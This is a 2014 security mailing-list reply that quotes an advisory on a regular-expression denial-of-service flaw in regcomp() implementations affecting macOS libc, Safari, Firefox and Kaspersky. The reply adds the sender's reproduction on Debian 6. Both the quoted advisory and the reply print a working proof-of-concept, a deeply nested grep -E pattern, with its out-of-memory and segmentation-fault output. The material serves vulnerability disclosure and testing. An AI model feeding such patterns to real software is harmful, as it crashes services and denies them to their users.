Re: MacOSX Safari Firefox Kaspersky RegExp Remote/Local Denial of Service

Pavel Machek <pavel@xxxxxx> · Tue, 10 Jun 2014 12:31:09 +0200

Hi!
> MacOSX Safari Firefox Kaspersky RegExp Remote/Local Denial of
Service

> http://cxsecurity.com/
> 
> YouTube (Kaspersky PoC):
> https://www.youtube.com/watch?v=joa_9IS7U90
> 
> ---- 0. Where is the problem? ----
> Some time ago I have reported vulnerabilities in regcomp() in BSD implementation (CVE-2011-3336) and GNU libc implementation (CVE-2010-4051 CVE-2010-4052). 
> Now is the time for MacOSX and other software and It seems that the problem is still in their implementations. 
> 
> 
> --- MacOSX 10.9.2 libc PoC ---
> 0:kozak6 cx$ ls |grep -E '((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))'
> grep(715,0x7fff746ed310) malloc: *** mach_vm_map(size=18446744071973109760) failed (error code=3)
> *** error: can't allocate region
> *** set a breakpoint in malloc_error_break to debug
> grep: out of memory
> --- MacOSX 10.9.2 libc PoC ---

Hmm. On debian 6, I get even worse-looking result:

pavel@amd:~$ ls |grep -E
'((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))'

Segmentation fault (core dumped)
pavel@amd:~$ 
pavel@amd:~$ cat /etc/debian_version 
6.0.9
pavel@amd:~$ 
pavel@amd:~/WWW$ uname -a
Linux amd 3.15.0-rc8+ #364 SMP Sun Jun 8 13:47:52 CEST 2014 i686
GNU/Linux

										Pavel
-- 
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html